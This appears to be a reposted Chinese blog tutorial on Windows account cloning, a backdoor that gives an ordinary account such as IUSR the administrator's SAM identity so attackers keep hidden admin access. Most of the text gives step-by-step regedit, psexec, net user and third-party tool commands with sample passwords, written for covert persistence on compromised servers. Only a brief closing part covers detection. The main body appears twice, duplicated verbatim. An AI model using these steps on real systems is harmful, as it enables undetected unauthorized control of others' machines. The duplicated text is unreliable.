方法一、经常看到一些人在***一台
Windows 2000或者Windows NT后堂而皇之地创建一个
管理员组的
用户,似 乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些 过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。
首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的 500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选 择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下 的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。
运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http:// www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行-- [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的"1F4"修改为 IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装 IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的"1F4"修改为"3E9"后执 行
regedit /s adam.reg
导入该Reg文件
然后运行
net user IUSR_MachineName Sometips
修改IUSR_MachineName的 密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)
OK,大功告成...
这样,我们拥有和默认管理员一样的 桌面、一样的Profile.....
而且,当我们运行 net localgroup administrators 时,看看结果:
C:\>net localgroup administrators
Alias name administrators
Co****dministrators have complete and unrestricted access to the computer/domain
Members
------------------------------------------------------------------------
Administrator
The command completed successfully.
再看看USER2SID的输出结果:
C:\>user2sid Administrator
S-1-5-21-1004336348-1078145449-854245398-500
Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
C:\>user2sid iusr_machinename
S-1-5-21-1004336348-1078145449-854245398-1001
Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用 IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName 为其他的名字吧)
^_^,这算不算RootKit...
二、克隆 账号的原理与危害
1.克隆账号的原理
在 注册表中有两处保存了账号的SID相对标志符,一处是注册表HKEY_LOCAL_MACHINESAMAMDomainsAccountUsers 下的子键名,另一处是该子键的子项F的值。但 微软犯了个不同步它们的错误,登录时用的是后者,查询时用前者。当用Administrator的F项覆盖其他账号的F项后,就造成了账号是管理员权限,但查询还是原来状态的情况,这就是所谓的克隆账号。
安全小知识:SID也就是安全标识符(Security Identifiers),是标识用户、组和 计算机账户的唯一的号码。在第一次创建该账户时,将给网络上的每一个账户发布一个唯一的 SID。Windows 2000 中的内部进程将引用账户的 SID 而不是账户的用户或组名。如果创建账户,再删除账户,然后使用相同的 用户名创建另一个账户,则新账户将不具有授权给前一个账户的权力或权限,原因是该账户具有不同的 SID 号。
2. 克隆账号的危害
当 系统用户一旦被克隆,配合终端服务,就等于向***者开启了一扇隐蔽的后门,让***者可以随时进入你的系统,这一扇门你看不到,因为它依靠的是微软的终端服务,并没有释放病毒文件,所以也不会被杀毒 软件所查杀。
克隆用户的常用方法
1.手工克隆方法一
在Windows 2000/xp/2003和Windows NT里,默认管理员账号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个账号将SID为500的账号进行克隆,在这里我们选择的账号是IUSR_XODU5PTT910NHOO(XODU5PTT910NHOO为已被攻陷的 服务器机器名。为了加强隐蔽性,我们选择了这个账号,所有用户都可以用以下的方法,只不过这个用户较常见罢了)
我们这里要用到的一个 工具是PsExec,一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台 应用程序相当的完全交互性。PsExec 最强大的 功能之一是在远程系统和远程支持工具(如 IpConfig)中启动交互式命令提示窗口,以便显示无法通过其他方式显示的有关远程系统的信息。
执行:psexec -i -s -d cmd运行一个System的CMD Shell,如图1所示
得到一个有system权限的cmd shell,然后在该CMD Shell里面运行“regedit /e admin.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4”,这样我们将SID为500(0x1f4)的管理员账号的相关信息导出。
然后编辑admin.reg文件,将admin.reg文件的第三行HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4中的“1F4”修改为IUSR_XODU5PTT910NHOO的SID,将文件中的“1F4”修改为“3EB”,如图3所示。
注意:大部份机器里IUSR_MACHINE用户的SID都为0x3E9(如果机器在最初安装的时候没有安装IIS,而是自己创建了账号后再安装IIS就有可能不是这个值了),如果不确定,可以使用:
“regedit /e sid.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesIUSR_MACHINE”命令先导出注册表,然后编辑sid.reg文件,就可以看到SID为“3EB”,如图5所示。
2.手工克隆方法二
另外一种克隆账户的方法是:首先运行regedt32.exe,展开注册表到HKEY_LOCAL_MACHINESAMSAM,然后点菜单栏的“编辑”→“权限”(Windows 2000是菜单栏的“安全”→“权限”),会弹出“SAM的权限”窗口,点击Administrators,在该窗口中勾选允许完全控制,(Windows 2000是在该窗口中勾选“允许将来自父系的可继承权限传播给该对象”)然后点击“确定”按钮。如图6所示。
再找到HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers0001F4,双击右边窗口中的“F”项,如图7所示。
选取全部内容,然后点击鼠标右键选“复制”,再打开HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers0003EB下的F项,将刚才复制的内容粘贴进去,这样我们就将IUSR_XODU5PTT910NHOO账号克隆成了管理员,再将刚才SAM目录的权限给删掉,以免被人发现。
3.使用mt克隆
mt.exe是一款非常强大的网络工具,它主要以命令行方式执行,可以开启系统服务,检查用户以及直接显示用户登陆密码等。它就象一把双刃剑,***者和系统管理员都要使用它,但由于常被***者使用,所以被很多 杀毒软件列为病毒。
关于MT的详细测试报告可以到 http://www.antian365.com/bbs/viewthread.php?tid=2786&extra=page%3D1&frombbs=1了解。克隆用户的用法如下:
mt -clone
如:mt -clone adminstrator IUSR_XODU5PTT910NHOO
如图8所示。
就是把管理员账号administrator克隆为IUSR_XODU5PTT910NHOO账号。最后执行“net user IUSR_XODU5PTT910NHOO n3tl04d”命令,修改IUSR_XODU5PTT910NHOO的密码为n3tl04d。
4.使用AIO克隆
AIO(All In One)是WinEggDrop写的一个把很多小工具功能集成一体的一个“工具”,其中有克隆用户、修改服务的启动类型、删除系统账户、检查系统隐藏服务、端口扫描和端口转发等等。
使用AIO克隆很简单,就是: Aio.exe -Clone 正常账号 要被克隆账户 密码
如: Aio.exe -Clone Administrator IUSR_XODU5PTT910NHOO n3tl04d
这样就可以用IUSR_XODU5PTT910NHOOn3tl04d作为管理员登录了。
如图9所示。
5.使用CA克隆
ca.exe 小榕编写的一个远程克隆账号工具,当然本地克隆也没问题。
用法如下:ca ip地址 管理员用户名 管理员密码 克隆的用户 密码
如:ca 127.0.0.1 administrator 123456 IUSR_XODU5PTT910NHOO 123456
如图10所示。
6.建立隐藏账号
需要使用的工具叫adhider,是锦毛鼠写的一个专门建立隐藏用户的工具。此工具有个缺点,那就是当服务器重启后,用户就隐藏不了,会在用户管理中显示出来。
用法如下:adhider 用户名 密码
如:adhider n3tl04d$123456
如图11所示。
创建成功后就可以使用
n3tl04d$123456登录,得到和管理员权限。
7.使用clone克隆
clone是28度的冰写的一个克隆工具,只支持windows2003和windowsxp,不支持windows2000。此工具有个缺点,那就是当服务器重启后,用户就隐藏不了,会在用户管理中显示出来。
用法如下:Clone.exe 用户名 密码
如:clone n3tl04d 520mm
如图12所示。
就可以使用n3tl04d520mm登录,得到和管理员权限。
注意:在Windows 2003下如果使用clone克隆后,再使用MT检查,会提示你没有系统权限,此时需要重启 电脑或者运行一个有system权限的cmd才能使用MT检查。
三、克隆用户安全检查与防范
当系统用户被克隆之后,更改管理员也无济于事,服务器上面的信息和数据还是被***者随意窃取。所以必须把克隆的用户清除,再做其它方面的安全检查。
在检查是否存在克隆用户前,最好重启一下系统。对于上面第六和第七种方法克隆的,就会在用户管理里显示出来了,一看就知道。如图13所示。
如果发现有克隆账号,可以用mt或AIO软件进行删除。
1.使用MT检查
在cmd命令行下,使用“mt–chkuser”命令,检查系统克隆账号,输入命令后,会在屏幕中输出结果,主要查看ExpectedSID和CheckedSID,如果这两个值不一样则说明账号被克隆了。如图14所示。
从图中可以看出,IUSR_XODU5PTT910NHOO用户的ExpectedSID和CheckedSID不一样,且它的CheckedSID值是和管理员administrator的CheckedSID值一样,很明显IUSR_XODU5PTT910NHOO是一个克隆的账号。
从图中可以看出,IUSR_XODU5PTT910NHOO用户的ExpectedSID和CheckedSID不一样,且它的CheckedSID值是和管理员administrator的CheckedSID值一样,很明显IUSR_XODU5PTT910NHOO是一个克隆的账号
首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的 500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选 择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下 的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。
运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http:// www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行-- [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的"1F4"修改为 IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装 IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的"1F4"修改为"3E9"后执 行
regedit /s adam.reg
导入该Reg文件
然后运行
net user IUSR_MachineName Sometips
修改IUSR_MachineName的 密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)
OK,大功告成...
这样,我们拥有和默认管理员一样的 桌面、一样的Profile.....
而且,当我们运行 net localgroup administrators 时,看看结果:
C:\>net localgroup administrators
Alias name administrators
Co****dministrators have complete and unrestricted access to the computer/domain
Members
------------------------------------------------------------------------
Administrator
The command completed successfully.
再看看USER2SID的输出结果:
C:\>user2sid Administrator
S-1-5-21-1004336348-1078145449-854245398-500
Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
C:\>user2sid iusr_machinename
S-1-5-21-1004336348-1078145449-854245398-1001
Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用 IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName 为其他的名字吧)
^_^,这算不算RootKit...
二、克隆 账号的原理与危害
1.克隆账号的原理
在 注册表中有两处保存了账号的SID相对标志符,一处是注册表HKEY_LOCAL_MACHINESAMAMDomainsAccountUsers 下的子键名,另一处是该子键的子项F的值。但 微软犯了个不同步它们的错误,登录时用的是后者,查询时用前者。当用Administrator的F项覆盖其他账号的F项后,就造成了账号是管理员权限,但查询还是原来状态的情况,这就是所谓的克隆账号。
安全小知识:SID也就是安全标识符(Security Identifiers),是标识用户、组和 计算机账户的唯一的号码。在第一次创建该账户时,将给网络上的每一个账户发布一个唯一的 SID。Windows 2000 中的内部进程将引用账户的 SID 而不是账户的用户或组名。如果创建账户,再删除账户,然后使用相同的 用户名创建另一个账户,则新账户将不具有授权给前一个账户的权力或权限,原因是该账户具有不同的 SID 号。
2. 克隆账号的危害
当 系统用户一旦被克隆,配合终端服务,就等于向***者开启了一扇隐蔽的后门,让***者可以随时进入你的系统,这一扇门你看不到,因为它依靠的是微软的终端服务,并没有释放病毒文件,所以也不会被杀毒 软件所查杀。
克隆用户的常用方法
1.手工克隆方法一
在Windows 2000/xp/2003和Windows NT里,默认管理员账号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个账号将SID为500的账号进行克隆,在这里我们选择的账号是IUSR_XODU5PTT910NHOO(XODU5PTT910NHOO为已被攻陷的 服务器机器名。为了加强隐蔽性,我们选择了这个账号,所有用户都可以用以下的方法,只不过这个用户较常见罢了)
我们这里要用到的一个 工具是PsExec,一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台 应用程序相当的完全交互性。PsExec 最强大的 功能之一是在远程系统和远程支持工具(如 IpConfig)中启动交互式命令提示窗口,以便显示无法通过其他方式显示的有关远程系统的信息。
执行:psexec -i -s -d cmd运行一个System的CMD Shell,如图1所示
得到一个有system权限的cmd shell,然后在该CMD Shell里面运行“regedit /e admin.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4”,这样我们将SID为500(0x1f4)的管理员账号的相关信息导出。
然后编辑admin.reg文件,将admin.reg文件的第三行HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4中的“1F4”修改为IUSR_XODU5PTT910NHOO的SID,将文件中的“1F4”修改为“3EB”,如图3所示。
注意:大部份机器里IUSR_MACHINE用户的SID都为0x3E9(如果机器在最初安装的时候没有安装IIS,而是自己创建了账号后再安装IIS就有可能不是这个值了),如果不确定,可以使用:
“regedit /e sid.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesIUSR_MACHINE”命令先导出注册表,然后编辑sid.reg文件,就可以看到SID为“3EB”,如图5所示。
2.手工克隆方法二
另外一种克隆账户的方法是:首先运行regedt32.exe,展开注册表到HKEY_LOCAL_MACHINESAMSAM,然后点菜单栏的“编辑”→“权限”(Windows 2000是菜单栏的“安全”→“权限”),会弹出“SAM的权限”窗口,点击Administrators,在该窗口中勾选允许完全控制,(Windows 2000是在该窗口中勾选“允许将来自父系的可继承权限传播给该对象”)然后点击“确定”按钮。如图6所示。
再找到HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers0001F4,双击右边窗口中的“F”项,如图7所示。
选取全部内容,然后点击鼠标右键选“复制”,再打开HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers0003EB下的F项,将刚才复制的内容粘贴进去,这样我们就将IUSR_XODU5PTT910NHOO账号克隆成了管理员,再将刚才SAM目录的权限给删掉,以免被人发现。
3.使用mt克隆
mt.exe是一款非常强大的网络工具,它主要以命令行方式执行,可以开启系统服务,检查用户以及直接显示用户登陆密码等。它就象一把双刃剑,***者和系统管理员都要使用它,但由于常被***者使用,所以被很多 杀毒软件列为病毒。
关于MT的详细测试报告可以到 http://www.antian365.com/bbs/viewthread.php?tid=2786&extra=page%3D1&frombbs=1了解。克隆用户的用法如下:
mt -clone
如:mt -clone adminstrator IUSR_XODU5PTT910NHOO
如图8所示。
就是把管理员账号administrator克隆为IUSR_XODU5PTT910NHOO账号。最后执行“net user IUSR_XODU5PTT910NHOO n3tl04d”命令,修改IUSR_XODU5PTT910NHOO的密码为n3tl04d。
4.使用AIO克隆
AIO(All In One)是WinEggDrop写的一个把很多小工具功能集成一体的一个“工具”,其中有克隆用户、修改服务的启动类型、删除系统账户、检查系统隐藏服务、端口扫描和端口转发等等。
使用AIO克隆很简单,就是: Aio.exe -Clone 正常账号 要被克隆账户 密码
如: Aio.exe -Clone Administrator IUSR_XODU5PTT910NHOO n3tl04d
这样就可以用IUSR_XODU5PTT910NHOOn3tl04d作为管理员登录了。
如图9所示。
5.使用CA克隆
ca.exe 小榕编写的一个远程克隆账号工具,当然本地克隆也没问题。
用法如下:ca ip地址 管理员用户名 管理员密码 克隆的用户 密码
如:ca 127.0.0.1 administrator 123456 IUSR_XODU5PTT910NHOO 123456
如图10所示。
6.建立隐藏账号
需要使用的工具叫adhider,是锦毛鼠写的一个专门建立隐藏用户的工具。此工具有个缺点,那就是当服务器重启后,用户就隐藏不了,会在用户管理中显示出来。
用法如下:adhider 用户名 密码
如:adhider n3tl04d$123456
如图11所示。
创建成功后就可以使用
n3tl04d$123456登录,得到和管理员权限。
7.使用clone克隆
clone是28度的冰写的一个克隆工具,只支持windows2003和windowsxp,不支持windows2000。此工具有个缺点,那就是当服务器重启后,用户就隐藏不了,会在用户管理中显示出来。
用法如下:Clone.exe 用户名 密码
如:clone n3tl04d 520mm
如图12所示。
就可以使用n3tl04d520mm登录,得到和管理员权限。
注意:在Windows 2003下如果使用clone克隆后,再使用MT检查,会提示你没有系统权限,此时需要重启 电脑或者运行一个有system权限的cmd才能使用MT检查。
三、克隆用户安全检查与防范
当系统用户被克隆之后,更改管理员也无济于事,服务器上面的信息和数据还是被***者随意窃取。所以必须把克隆的用户清除,再做其它方面的安全检查。
在检查是否存在克隆用户前,最好重启一下系统。对于上面第六和第七种方法克隆的,就会在用户管理里显示出来了,一看就知道。如图13所示。
如果发现有克隆账号,可以用mt或AIO软件进行删除。
1.使用MT检查
在cmd命令行下,使用“mt–chkuser”命令,检查系统克隆账号,输入命令后,会在屏幕中输出结果,主要查看ExpectedSID和CheckedSID,如果这两个值不一样则说明账号被克隆了。如图14所示。
从图中可以看出,IUSR_XODU5PTT910NHOO用户的ExpectedSID和CheckedSID不一样,且它的CheckedSID值是和管理员administrator的CheckedSID值一样,很明显IUSR_XODU5PTT910NHOO是一个克隆的账号。
从图中可以看出,IUSR_XODU5PTT910NHOO用户的ExpectedSID和CheckedSID不一样,且它的CheckedSID值是和管理员administrator的CheckedSID值一样,很明显IUSR_XODU5PTT910NHOO是一个克隆的账号
转载于:https://blog.51cto.com/qinfeifan/589821
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
